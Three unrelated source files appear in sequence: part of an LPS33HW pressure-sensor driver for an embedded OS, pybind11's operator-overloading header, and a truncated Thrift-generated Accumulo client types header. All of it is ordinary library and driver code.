failure. */ static int lps33hw_i2c_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size, uint8_t *buffer) { int rc; struct hal_i2c_master_data data_struct = { .address = itf->si_addr, .len = 1, .buffer = &reg }; /* Register write */ rc = hal_i2c_master_write(itf->si_num, &data_struct, OS_TICKS_PER_SEC / 10, 1); if (rc) { LPS33HW_ERR("I2C access failed at address 0x%02X\n", itf->si_addr); STATS_INC(g_lps33hwstats, write_errors); return rc; } /* Read */ data_struct.len = size; data_struct.buffer = buffer; rc = hal_i2c_master_read(itf->si_num, &data_struct, (OS_TICKS_PER_SEC / 10) * size, 1); if (rc) { LPS33HW_ERR("Failed to read from 0x%02X:0x%02X\n", itf->si_addr, reg); STATS_INC(g_lps33hwstats, read_errors); } return rc; } /** * Read bytes from the specified register using specified interface * * @param The sensor interface * @param The register address to read from * @param The number of bytes to read * @param Pointer to where the register value should be written * * @return 0 on success, non-zero error on failure. */ static int lps33hw_get_regs(struct sensor_itf *itf, uint8_t reg, uint8_t size, uint8_t *buffer) { int rc; if (itf->si_type == SENSOR_ITF_I2C) { rc = lps33hw_i2c_get_regs(itf, reg, size, buffer); } else { rc = lps33hw_spi_get_regs(itf, reg, size, buffer); } return rc; } static int lps33hw_apply_value(struct lps33hw_register_value addr, uint8_t value, uint8_t *reg) { value <<= addr.pos; if ((value & (~addr.mask)) != 0) { return -1; } *reg &= ~addr.mask; *reg |= value; return 0; } int lps33hw_set_value(struct sensor_itf *itf, struct lps33hw_register_value addr, uint8_t value) { int rc; uint8_t reg; rc = lps33hw_get_regs(itf, addr.reg, 1, &reg); if (rc != 0) { return rc; } rc = lps33hw_apply_value(addr, value, &reg); if (rc != 0) { return rc; } return lps33hw_set_reg(itf, addr.reg, reg); } int lps33hw_get_value(struct sensor_itf *itf, struct lps33hw_register_value addr, uint8_t *value) { int rc; uint8_t reg; rc = lps33hw_get_regs(itf, addr.reg, 1, &reg); *value = (reg & addr.mask) >> addr.pos; return rc; } int lps33hw_set_data_rate(struct sensor_itf *itf, enum lps33hw_output_data_rates rate) { return lps33hw_set_value(itf, LPS33HW_CTRL_REG1_ODR, rate); } int lps33hw_set_lpf(struct sensor_itf *itf, enum lps33hw_low_pass_config lpf) { return lps33hw_set_value(itf, LPS33HW_CTRL_REG1_LPFP_CFG, lpf); } int lps33hw_reset(struct sensor_itf *itf) { return lps33hw_set_reg(itf, LPS33HW_CTRL_REG2, 0x04); } int lps33hw_get_pressure_regs(struct sensor_itf *itf, uint8_t reg, float *pressure) { int rc; uint8_t payload[3]; int32_t int_press; rc = lps33hw_get_regs(itf, reg, 3, payload); if (rc) { return rc; } int_press = (((int32_t)payload[2] << 16) | ((int32_t)payload[1] << 8) | payload[0]); if (int_press & 0x00800000) { int_press |= 0xff000000; } *pressure = lps33hw_reg_to_pa(int_press); return 0; } int lps33hw_get_pressure(struct sensor_itf *itf, float *pressure) { return lps33hw_get_pressure_regs(itf, LPS33HW_PRESS_OUT, pressure); } int lps33hw_get_temperature(struct sensor_itf *itf, float *temperature) { int rc; uint8_t payload[2]; uint16_t int_temp; rc = lps33hw_get_regs(itf, LPS33HW_TEMP_OUT, 2, payload); if (rc) { return rc; } int_temp = (((uint32_t)payload[1] << 8) | payload[0]); *temperature = lps33hw_reg_to_degc(int_temp); return 0; } int lps33hw_set_reference(struct sensor_itf *itf, float reference) { int rc; int32_t int_reference; int_reference = lps33hw_pa_to_reg(reference); rc = lps33hw_set_reg(itf, LPS33HW_REF_P, int_reference & 0xff); if (rc) { return rc; } rc = lps33hw_set_reg(itf, LPS33HW_REF_P + 1, (int_reference >> 8) & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_REF_P + 2, (int_reference >> 16) & 0xff); } int lps33hw_set_threshold(struct sensor_itf *itf, float threshold) { int rc; int16_t int_threshold; int_threshold = lps33hw_pa_to_threshold_reg(threshold); rc = lps33hw_set_reg(itf, LPS33HW_THS_P, int_threshold & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_THS_P + 1, (int_threshold >> 8) & 0xff); } int lps33hw_set_rpds(struct sensor_itf *itf, uint16_t rpds) { int rc; rc = lps33hw_set_reg(itf, LPS33HW_RPDS, rpds & 0xff); if (rc) { return rc; } return lps33hw_set_reg(itf, LPS33HW_RPDS + 1, (rpds >> 8) & 0xff); } int lps33hw_enable_interrupt(struct sensor *sensor, hal_gpio_irq_handler_t handler, void *arg) { int rc; struct lps33hw *lps33hw; struct sensor_itf *itf; hal_gpio_irq_trig_t trig; hal_gpio_pull_t pull; struct lps33hw_int_cfg *int_cfg; float press; uint8_t int_source; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; trig = (int_cfg->active_low) ? HAL_GPIO_TRIG_FALLING : HAL_GPIO_TRIG_RISING; pull = (int_cfg->open_drain) ? HAL_GPIO_PULL_UP : HAL_GPIO_PULL_NONE; rc = hal_gpio_irq_init(int_cfg->pin, handler, arg, trig, pull); if (rc) { return rc; } hal_gpio_irq_enable(int_cfg->pin); /* Read pressure and interrupt sources in order to reset the interrupt */ rc = lps33hw_get_pressure_regs(itf, LPS33HW_PRESS_OUT, &press); if (rc) { return rc; } (void)press; rc = lps33hw_get_regs(itf, LPS33HW_INT_SOURCE, 1, &int_source); if (rc) { return rc; } (void)int_source; return 0; } void lps33hw_disable_interrupt(struct sensor *sensor) { struct lps33hw *lps33hw; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); int_cfg = &lps33hw->cfg.int_cfg; hal_gpio_irq_release(int_cfg->pin); } /** * Handles and interrupt * * @param Pointer to sensor structure * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_handle_interrupt(struct sensor *sensor) { LPS33HW_ERR("Unhandled interrupt\n"); return 0; } /** * Clears the low threshold interrupt * * @param Pointer to sensor structure * @param Sensor type * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_clear_low_thresh(struct sensor *sensor, sensor_type_t type) { struct lps33hw *lps33hw; struct sensor_itf *itf; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; if (type != SENSOR_TYPE_PRESSURE) { return SYS_EINVAL; } int_cfg->pressure_low = 0; return lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, 0); } /** * Clears the high threshold interrupt * * @param Pointer to sensor structure * @param Sensor type * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_clear_high_thresh(struct sensor *sensor, sensor_type_t type) { struct lps33hw *lps33hw; struct sensor_itf *itf; struct lps33hw_int_cfg *int_cfg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); int_cfg = &lps33hw->cfg.int_cfg; if (type != SENSOR_TYPE_PRESSURE) { return SYS_EINVAL; } int_cfg->pressure_high = 0; return lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, 0); } static void lps33hw_threshold_interrupt_handler(void * arg) { struct sensor_type_traits *stt = arg; sensor_mgr_put_read_evt(stt); } int lps33hw_config_interrupt(struct sensor *sensor, struct lps33hw_int_cfg cfg) { int rc; struct lps33hw *lps33hw; struct sensor_itf *itf; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); lps33hw->cfg.int_cfg = cfg; if (cfg.data_rdy) { rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 0); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_S, 0); if (rc) { return rc; } } else if (cfg.pressure_low || cfg.pressure_high){ rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PLE, cfg.pressure_low); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_PHE, cfg.pressure_high); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 1); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_S, cfg.pressure_high | (cfg.pressure_low << 1)); if (rc) { return rc; } } else { rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_DIFF_EN, 0); if (rc) { return rc; } } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_DRDY, cfg.data_rdy); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_INT_H_L, cfg.active_low); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_CTRL_REG3_PP_OD, cfg.open_drain); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_LIR, cfg.latched); if (rc) { return rc; } return rc; } /** * Sets up trigger thresholds and enables interrupts * * @param Pointer to sensor structure * @param type of sensor * @param threshold settings to configure * * @return 0 on success, non-zero on failure */ static int lps33hw_sensor_set_trigger_thresh(struct sensor *sensor, sensor_type_t sensor_type, struct sensor_type_traits *stt) { struct lps33hw *lps33hw; struct sensor_itf *itf; int rc; struct sensor_press_data *low_thresh; struct sensor_press_data *high_thresh; struct lps33hw_int_cfg int_cfg; float reference; float threshold; if (sensor_type != SENSOR_TYPE_PRESSURE) { return SYS_EINVAL; } lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); low_thresh = stt->stt_low_thresh.spd; high_thresh = stt->stt_high_thresh.spd; int_cfg = lps33hw->cfg.int_cfg; /* turn off existing dready interrupt */ int_cfg.data_rdy = 0; int_cfg.pressure_low = low_thresh->spd_press_is_valid; int_cfg.pressure_high = high_thresh->spd_press_is_valid; threshold = 0; reference = 0; /* * Device only has one threshold which can be set to trigger on positive or * negative thresholds, set it to the lower threshold. */ if (int_cfg.pressure_low) { if (int_cfg.pressure_high) { threshold = (high_thresh->spd_press - low_thresh->spd_press) / 2; reference = low_thresh->spd_press + threshold; } else { reference = low_thresh->spd_press; } } else if (int_cfg.pressure_high) { reference = high_thresh->spd_press; } rc = lps33hw_set_reference(itf, reference); if (rc) { return rc; } rc = lps33hw_set_threshold(itf, threshold); if (rc) { return rc; } rc = lps33hw_config_interrupt(sensor, int_cfg); if (rc) { return rc; } rc = lps33hw_enable_interrupt(sensor, lps33hw_threshold_interrupt_handler, stt); if (rc) { return rc; } return 0; } int lps33hw_init(struct os_dev *dev, void *arg) { struct lps33hw *lps; struct sensor *sensor; int rc; if (!arg || !dev) { return SYS_ENODEV; } lps = (struct lps33hw *) dev; sensor = &lps->sensor; lps->cfg.mask = SENSOR_TYPE_ALL; log_register(dev->od_name, &_log, &log_console_handler, NULL, LOG_SYSLEVEL); /* Initialise the stats entry */ rc = stats_init( STATS_HDR(g_lps33hwstats), STATS_SIZE_INIT_PARMS(g_lps33hwstats, STATS_SIZE_32), STATS_NAME_INIT_PARMS(lps33hw_stat_section)); SYSINIT_PANIC_ASSERT(rc == 0); /* Register the entry with the stats registry */ rc = stats_register(dev->od_name, STATS_HDR(g_lps33hwstats)); SYSINIT_PANIC_ASSERT(rc == 0); rc = sensor_init(sensor, dev); if (rc) { return rc; } /* Add the pressure and temperature driver */ rc = sensor_set_driver(sensor, SENSOR_TYPE_PRESSURE | SENSOR_TYPE_TEMPERATURE, (struct sensor_driver *) &g_lps33hw_sensor_driver); if (rc) { return rc; } rc = sensor_set_interface(sensor, arg); if (rc) { return rc; } rc = sensor_mgr_register(sensor); if (rc) { return rc; } if (sensor->s_itf.si_type == SENSOR_ITF_SPI) { rc = hal_spi_config(sensor->s_itf.si_num, &spi_lps33hw_settings); if (rc == EINVAL) { /* If spi is already enabled, for nrf52, it returns -1, We should not * fail if the spi is already enabled */ return rc; } rc = hal_spi_enable(sensor->s_itf.si_num); if (rc) { return rc; } rc = hal_gpio_init_out(sensor->s_itf.si_cs_pin, 1); if (rc) { return rc; } } return rc; } int lps33hw_config(struct lps33hw *lps, struct lps33hw_cfg *cfg) { int rc; struct sensor_itf *itf; itf = SENSOR_GET_ITF(&(lps->sensor)); uint8_t val; rc = lps33hw_get_regs(itf, LPS33HW_WHO_AM_I, 1, &val); if (rc) { return rc; } if (val != LPS33HW_WHO_AM_I_VAL) { return SYS_EINVAL; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_AUTORIFP, cfg->autorifp); if (rc) { return rc; } rc = lps33hw_set_value(itf, LPS33HW_INTERRUPT_CFG_AUTOZERO, cfg->autozero); if (rc) { return rc; } rc = lps33hw_set_data_rate(itf, cfg->data_rate); if (rc) { return rc; } rc = lps33hw_set_lpf(itf, cfg->lpf); if (rc) { return rc; } rc = lps33hw_config_interrupt(&(lps->sensor), cfg->int_cfg); if (rc) { } rc = sensor_set_type_mask(&(lps->sensor), cfg->mask); if (rc) { return rc; } lps->cfg.mask = cfg->mask; return 0; } static void lps33hw_read_interrupt_handler(void *arg) { int rc; struct sensor *sensor; struct lps33hw *lps33hw; struct sensor_itf *itf; struct sensor_press_data spd; sensor = (struct sensor *)arg; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); itf = SENSOR_GET_ITF(sensor); rc = lps33hw_get_pressure(itf, &spd.spd_press); if (rc) { LPS33HW_ERR("Get pressure failed\n"); spd.spd_press_is_valid = 0; } else { spd.spd_press_is_valid = 1; lps33hw->pdd.user_handler(sensor, lps33hw->pdd.user_arg, &spd, SENSOR_TYPE_PRESSURE); } } static int lps33hw_sensor_read(struct sensor *sensor, sensor_type_t type, sensor_data_func_t data_func, void *data_arg, uint32_t timeout) { (void)timeout; int rc; struct sensor_itf *itf; itf = SENSOR_GET_ITF(sensor); if (type & SENSOR_TYPE_PRESSURE) { struct lps33hw *lps33hw; lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); if (lps33hw->cfg.int_cfg.data_rdy) { /* Stream read */ lps33hw->pdd.user_handler = data_func; lps33hw->pdd.user_arg = data_arg; rc = lps33hw_enable_interrupt(sensor, lps33hw_read_interrupt_handler, sensor); if (rc) { return rc; } } else { /* Read once */ struct sensor_press_data spd; rc = lps33hw_get_pressure(itf, &spd.spd_press); if (rc) { return rc; } spd.spd_press_is_valid = 1; rc = data_func(sensor, data_arg, &spd, SENSOR_TYPE_PRESSURE); } } else if (type & SENSOR_TYPE_TEMPERATURE) { struct sensor_temp_data std; rc = lps33hw_get_temperature(itf, &std.std_temp); if (rc) { return rc; } std.std_temp_is_valid = 1; rc = data_func(sensor, data_arg, &std, SENSOR_TYPE_TEMPERATURE); } else { return SYS_EINVAL; } return rc; } static int lps33hw_sensor_set_config(struct sensor *sensor, void *cfg) { struct lps33hw* lps33hw = (struct lps33hw *)SENSOR_GET_DEVICE(sensor); return lps33hw_config(lps33hw, (struct lps33hw_cfg*)cfg); } static int lps33hw_sensor_get_config(struct sensor *sensor, sensor_type_t type, struct sensor_cfg *cfg) { /* If the read isn't looking for pressure, don't do anything. */ if (!(type & (SENSOR_TYPE_PRESSURE | SENSOR_TYPE_TEMPERATURE))) { return SYS_EINVAL; } cfg->sc_valtype = SENSOR_VALUE_TYPE_FLOAT; return 0; }
/* pybind11/operator.h: Metatemplates for operator overloading Copyright (c) 2016 Wenzel Jakob <wenzel.jakob@epfl.ch> All rights reserved. Use of this source code is governed by a BSD-style license that can be found in the LICENSE file. */ #pragma once #include "pybind11.h" #if defined(__clang__) && !defined(__INTEL_COMPILER) # pragma clang diagnostic ignored "-Wunsequenced" // multiple unsequenced modifications to 'self' (when using def(py::self OP Type())) #elif defined(_MSC_VER) # pragma warning(push) # pragma warning(disable: 4127) // warning C4127: Conditional expression is constant #endif PYBIND11_NAMESPACE_BEGIN(PYBIND11_NAMESPACE) PYBIND11_NAMESPACE_BEGIN(detail) /// Enumeration with all supported operator types enum op_id : int { op_add, op_sub, op_mul, op_div, op_mod, op_divmod, op_pow, op_lshift, op_rshift, op_and, op_xor, op_or, op_neg, op_pos, op_abs, op_invert, op_int, op_long, op_float, op_str, op_cmp, op_gt, op_ge, op_lt, op_le, op_eq, op_ne, op_iadd, op_isub, op_imul, op_idiv, op_imod, op_ilshift, op_irshift, op_iand, op_ixor, op_ior, op_complex, op_bool, op_nonzero, op_repr, op_truediv, op_itruediv, op_hash }; enum op_type : int { op_l, /* base type on left */ op_r, /* base type on right */ op_u /* unary operator */ }; struct self_t { }; static const self_t self = self_t(); /// Type for an unused type slot struct undefined_t { }; /// Don't warn about an unused variable inline self_t __self() { return self; } /// base template of operator implementations template <op_id, op_type, typename B, typename L, typename R> struct op_impl { }; /// Operator implementation generator template <op_id id, op_type ot, typename L, typename R> struct op_ { template <typename Class, typename... Extra> void execute(Class &cl, const Extra&... extra) const { using Base = typename Class::type; using L_type = conditional_t<std::is_same<L, self_t>::value, Base, L>; using R_type = conditional_t<std::is_same<R, self_t>::value, Base, R>; using op = op_impl<id, ot, Base, L_type, R_type>; cl.def(op::name(), &op::execute, is_operator(), extra...); #if PY_MAJOR_VERSION < 3 if (id == op_truediv || id == op_itruediv) cl.def(id == op_itruediv ? "__idiv__" : ot == op_l ? "__div__" : "__rdiv__", &op::execute, is_operator(), extra...); #endif } template <typename Class, typename... Extra> void execute_cast(Class &cl, const Extra&... extra) const { using Base = typename Class::type; using L_type = conditional_t<std::is_same<L, self_t>::value, Base, L>; using R_type = conditional_t<std::is_same<R, self_t>::value, Base, R>; using op = op_impl<id, ot, Base, L_type, R_type>; cl.def(op::name(), &op::execute_cast, is_operator(), extra...); #if PY_MAJOR_VERSION < 3 if (id == op_truediv || id == op_itruediv) cl.def(id == op_itruediv ? "__idiv__" : ot == op_l ? "__div__" : "__rdiv__", &op::execute, is_operator(), extra...); #endif } }; #define PYBIND11_BINARY_OPERATOR(id, rid, op, expr) \ template <typename B, typename L, typename R> struct op_impl<op_##id, op_l, B, L, R> { \ static char const* name() { return "__" #id "__"; } \ static auto execute(const L &l, const R &r) -> decltype(expr) { return (expr); } \ static B execute_cast(const L &l, const R &r) { return B(expr); } \ }; \ template <typename B, typename L, typename R> struct op_impl<op_##id, op_r, B, L, R> { \ static char const* name() { return "__" #rid "__"; } \ static auto execute(const R &r, const L &l) -> decltype(expr) { return (expr); } \ static B execute_cast(const R &r, const L &l) { return B(expr); } \ }; \ inline op_<op_##id, op_l, self_t, self_t> op(const self_t &, const self_t &) { \ return op_<op_##id, op_l, self_t, self_t>(); \ } \ template <typename T> op_<op_##id, op_l, self_t, T> op(const self_t &, const T &) { \ return op_<op_##id, op_l, self_t, T>(); \ } \ template <typename T> op_<op_##id, op_r, T, self_t> op(const T &, const self_t &) { \ return op_<op_##id, op_r, T, self_t>(); \ } #define PYBIND11_INPLACE_OPERATOR(id, op, expr) \ template <typename B, typename L, typename R> struct op_impl<op_##id, op_l, B, L, R> { \ static char const* name() { return "__" #id "__"; } \ static auto execute(L &l, const R &r) -> decltype(expr) { return expr; } \ static B execute_cast(L &l, const R &r) { return B(expr); } \ }; \ template <typename T> op_<op_##id, op_l, self_t, T> op(const self_t &, const T &) { \ return op_<op_##id, op_l, self_t, T>(); \ } #define PYBIND11_UNARY_OPERATOR(id, op, expr) \ template <typename B, typename L> struct op_impl<op_##id, op_u, B, L, undefined_t> { \ static char const* name() { return "__" #id "__"; } \ static auto execute(const L &l) -> decltype(expr) { return expr; } \ static B execute_cast(const L &l) { return B(expr); } \ }; \ inline op_<op_##id, op_u, self_t, undefined_t> op(const self_t &) { \ return op_<op_##id, op_u, self_t, undefined_t>(); \ } PYBIND11_BINARY_OPERATOR(sub, rsub, operator-, l - r) PYBIND11_BINARY_OPERATOR(add, radd, operator+, l + r) PYBIND11_BINARY_OPERATOR(mul, rmul, operator*, l * r) PYBIND11_BINARY_OPERATOR(truediv, rtruediv, operator/, l / r) PYBIND11_BINARY_OPERATOR(mod, rmod, operator%, l % r) PYBIND11_BINARY_OPERATOR(lshift, rlshift, operator<<, l << r) PYBIND11_BINARY_OPERATOR(rshift, rrshift, operator>>, l >> r) PYBIND11_BINARY_OPERATOR(and, rand, operator&, l & r) PYBIND11_BINARY_OPERATOR(xor, rxor, operator^, l ^ r) PYBIND11_BINARY_OPERATOR(eq, eq, operator==, l == r) PYBIND11_BINARY_OPERATOR(ne, ne, operator!=, l != r) PYBIND11_BINARY_OPERATOR(or, ror, operator|, l | r) PYBIND11_BINARY_OPERATOR(gt, lt, operator>, l > r) PYBIND11_BINARY_OPERATOR(ge, le, operator>=, l >= r) PYBIND11_BINARY_OPERATOR(lt, gt, operator<, l < r) PYBIND11_BINARY_OPERATOR(le, ge, operator<=, l <= r) //PYBIND11_BINARY_OPERATOR(pow, rpow, pow, std::pow(l, r)) PYBIND11_INPLACE_OPERATOR(iadd, operator+=, l += r) PYBIND11_INPLACE_OPERATOR(isub, operator-=, l -= r) PYBIND11_INPLACE_OPERATOR(imul, operator*=, l *= r) PYBIND11_INPLACE_OPERATOR(itruediv, operator/=, l /= r) PYBIND11_INPLACE_OPERATOR(imod, operator%=, l %= r) PYBIND11_INPLACE_OPERATOR(ilshift, operator<<=, l <<= r) PYBIND11_INPLACE_OPERATOR(irshift, operator>>=, l >>= r) PYBIND11_INPLACE_OPERATOR(iand, operator&=, l &= r) PYBIND11_INPLACE_OPERATOR(ixor, operator^=, l ^= r) PYBIND11_INPLACE_OPERATOR(ior, operator|=, l |= r) PYBIND11_UNARY_OPERATOR(neg, operator-, -l) PYBIND11_UNARY_OPERATOR(pos, operator+, +l) // WARNING: This usage of `abs` should only be done for existing STL overloads. // Adding overloads directly in to the `std::` namespace is advised against: // https://en.cppreference.com/w/cpp/language/extending_std PYBIND11_UNARY_OPERATOR(abs, abs, std::abs(l)) PYBIND11_UNARY_OPERATOR(hash, hash, std::hash<L>()(l)) PYBIND11_UNARY_OPERATOR(invert, operator~, (~l)) PYBIND11_UNARY_OPERATOR(bool, operator!, !!l) PYBIND11_UNARY_OPERATOR(int, int_, (int) l) PYBIND11_UNARY_OPERATOR(float, float_, (double) l) #undef PYBIND11_BINARY_OPERATOR #undef PYBIND11_INPLACE_OPERATOR #undef PYBIND11_UNARY_OPERATOR PYBIND11_NAMESPACE_END(detail) using detail::self; // Add named operators so that they are accessible via `py::`. using detail::hash; PYBIND11_NAMESPACE_END(PYBIND11_NAMESPACE) #if defined(_MSC_VER) # pragma warning(pop) #endif
/** * Autogenerated by Thrift Compiler (0.12.0) * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ #ifndef client_TYPES_V2H #define client_TYPES_V2H #include <iosfwd> #include <thrift/Thrift.h> #include <thrift/TApplicationException.h> #include <thrift/TBase.h> #include <thrift/protocol/TProtocol.h> #include <thrift/transport/TTransport.h> #include <thrift/stdcxx.h> #include "security_types.h" #include "trace_types.h" namespace org { namespace apache { namespace accumulov2 { namespace core { namespace clientImpl { namespace thrift { struct TableOperation { enum type { CREATE = 0, DELETE = 1, RENAME = 2, SET_PROPERTY = 3, REMOVE_PROPERTY = 4, OFFLINE = 5, ONLINE = 6, FLUSH = 7, PERMISSION = 8, CLONE = 9, MERGE = 10, DELETE_RANGE = 11, BULK_IMPORT = 12, COMPACT = 13, IMPORT = 14, EXPORT = 15, COMPACT_CANCEL = 16 }; }; extern const std::map<int, const char*> _TableOperation_VALUES_TO_NAMES; std::ostream& operator<<(std::ostream& out, const TableOperation::type& val); struct TableOperationExceptionType { enum type { EXISTS = 0, NOTFOUND = 1, OFFLINE = 2, BULK_BAD_INPUT_DIRECTORY = 3, BULK_BAD_ERROR_DIRECTORY = 4, BAD_RANGE = 5, OTHER = 6, NAMESPACE_EXISTS = 7, NAMESPACE_NOTFOUND = 8, INVALID_NAME = 9, BULK_BAD_LOAD_MAPPING = 10, BULK_CONCURRENT_MERGE = 11 }; }; extern const std::map<int, const char*> _TableOperationExceptionType_VALUES_TO_NAMES; std::ostream& operator<<(std::ostream& out, const TableOperationExceptionType::type& val); struct ConfigurationType { enum type { CURRENT = 0, SITE = 1, DEFAULT = 2 }; }; extern const std::map<int, const char*> _ConfigurationType_VALUES_TO_NAMES; std::ostream& operator<<(std::ostream& out, const ConfigurationType::type& val); struct SecurityErrorCode { enum type { DEFAULT_SECURITY_ERROR = 0, BAD_CREDENTIALS = 1, PERMISSION_DENIED = 2, USER_DOESNT_EXIST = 3, CONNECTION_ERROR = 4, USER_EXISTS = 5, GRANT_INVALID = 6, BAD_AUTHORIZATIONS = 7, INVALID_INSTANCEID = 8, TABLE_DOESNT_EXIST = 9, UNSUPPORTED_OPERATION = 10, INVALID_TOKEN = 11, AUTHENTICATOR_FAILED = 12, AUTHORIZOR_FAILED = 13, PERMISSIONHANDLER_FAILED = 14, TOKEN_EXPIRED = 15, SERIALIZATION_ERROR = 16, INSUFFICIENT_PROPERTIES = 17, NAMESPACE_DOESNT_EXIST = 18 }; }; extern const std::map<int, const char*> _SecurityErrorCode_VALUES_TO_NAMES; std::ostream& operator<<(std::ostream& out, const SecurityErrorCode::type& val); class ThriftSecurityException; class ThriftTableOperationException; class ThriftNotActiveServiceException; class TDiskUsage; typedef struct _ThriftSecurityException__isset { _ThriftSecurityException__isset() : user(false), code(false) {} bool user :1; bool code :1; } _ThriftSecurityException__isset; class ThriftSecurityException : public ::apache::thrift::TException { public: ThriftSecurityException(const ThriftSecurityException&); ThriftSecurityException& operator=(const ThriftSecurityException&); ThriftSecurityException() : user(), code((SecurityErrorCode::type)0) { } virtual ~ThriftSecurityException() throw(); std::string user; SecurityErrorCode::type code; _ThriftSecurityException__isset __isset; void __set_user(const std::string& val); void __set_code(const SecurityErrorCode::type val); bool operator == (const ThriftSecurityException & rhs) const { if (!(user == rhs.user)) return false; if (!(code == rhs.code)) return false; return true; } bool operator != (const ThriftSecurityException &rhs) const { return !(*this == rhs); } bool operator < (const ThriftSecurityException & ) const; uint32_t read(::apache::thrift::protocol::TProtocol* iprot); uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const; virtual void printTo(std::ostream& out) const; mutable std::string thriftTExceptionMessageHolder_; const char* what() const throw(); }; void swap(ThriftSecurityException &a, ThriftSecurityException &b); std::ostream& operator<<(std::ostream& out, const ThriftSecurityException& obj); typedef struct _ThriftTableOperationException__isset { _ThriftTableOperationException__isset() : tableId(false), tableName(false), op(false), type(false), description(false) {} bool tableId :1; bool tableName :1; bool op :1; bool type :1; bool description :1; } _ThriftTableOperationException__isset; class ThriftTableOperationException : public ::apache::thrift::TException { public: ThriftTableOperationException(const ThriftTableOperationException&); ThriftTableOperationException& operator=(const ThriftTableOperationException&); ThriftTableOperationException() : tableId(), tableName(), op((TableOperation::type)0), type((TableOperationExceptionType::type)0), description() { } virtual ~ThriftTableOperationException() throw(); std::string tableId; std::string tableName; TableOperation::type op; TableOperationExceptionType::type type; std::string description; _ThriftTableOperationException__isset __isset; void __set_tableId(const std::string& val); void __set_tableName(const std::string& val); void __set_op(const TableOperation::type val); void __set_type(const TableOperationExceptionType::type val); void __set_description(const std::string& val); bool operator == (const ThriftTableOperationException & rhs) const { if (!(tableId == rhs.tableId)) return false; if (!(tableName == rhs.tableName)) return false; if (!(op == rhs.op)) return false; if (!(type == rhs.type)) return false; if (!(description == rhs.description)) return false; return true; } bool operator != (const ThriftTableOperationException &rhs) const { return !(*this == rhs); } bool operator < (const ThriftTableOperationException & ) const; uint32_t read(::apache::thrift::protocol::TProtocol* iprot); uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const; virtual void printTo(std::ostream& out) const; mutable std::string thriftTExceptionMessageHolder_; const char* what() const throw(); }; void swap(ThriftTableOperationException &a, ThriftTableOperationException &b); std::ostream& operator<<(std::ostream& out, const ThriftTableOperationException& obj); class ThriftNotActiveServiceException : public ::apache::thrift::TException { public: ThriftNotActiveServiceException(const ThriftNotActiveServiceException&); ThriftNotActiveServiceException& operator=(const ThriftNotActiveServiceException&); ThriftNotActiveServiceException() { } virtual ~ThriftNotActiveServiceException() throw(); bool operator == (const ThriftNotActiveServiceException & /* rhs */) const { return true; } bool operator != (const ThriftNotActiveServiceException &rhs) const { return !(*this == rhs); } bool operator < (const ThriftNotActiveServiceException & ) const; uint32_t read(::apache::thrift::protocol::TProtocol* iprot); uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const; virtual void printTo(std::ostream& out) const; mutable std::string thriftTExceptionMessageHolder_; const char* what() const throw(); }; void swap(ThriftNotActiveServiceException &a, ThriftNotActiveServiceException &b); std::ostream& operator<<(std::ostream& out, const ThriftNotActiveServiceException& obj); typedef struct _TDiskUsage__isset { _TDiskUsage__isset() : tables(false), usage(false) {} bool tables :1; bool usage :1; } _TDiskUsage__isset; class TDiskUsage : public virtual ::apache::thrift::TBase { public: TDiskUsage(const TDiskUsage&); TDiskUsage& operator=(const TDiskUsage&); TDiskUsage() : usage(0) { } virtual ~TDiskUsage() throw(); std::vector<std::string> tables; int64_t usage; _TDiskUsage__isset __isset; void __set_tables(const std::vector<std::string> & val); void __set_usage(const int64_t val); bool operator == (const TDiskUsage & rhs) const { if (!(tables == rhs.tables)) return false; if (!(usage == rhs.usage)) return false; return true; } bool operator != (const TDiskUsage &rhs) const { return !(*this == rhs); } bool operator < (const TDiskUsage & ) const; uint32_t read(::apache::thrift::protocol::TProtocol* iprot); uint32_t write(::apache::thrift::protocol::TProtocol* oprot) const; virtual void printTo(std::ostream& out) const; }; void swap(TDiskUsage &a, TDiskUsage &b); std::ostream& 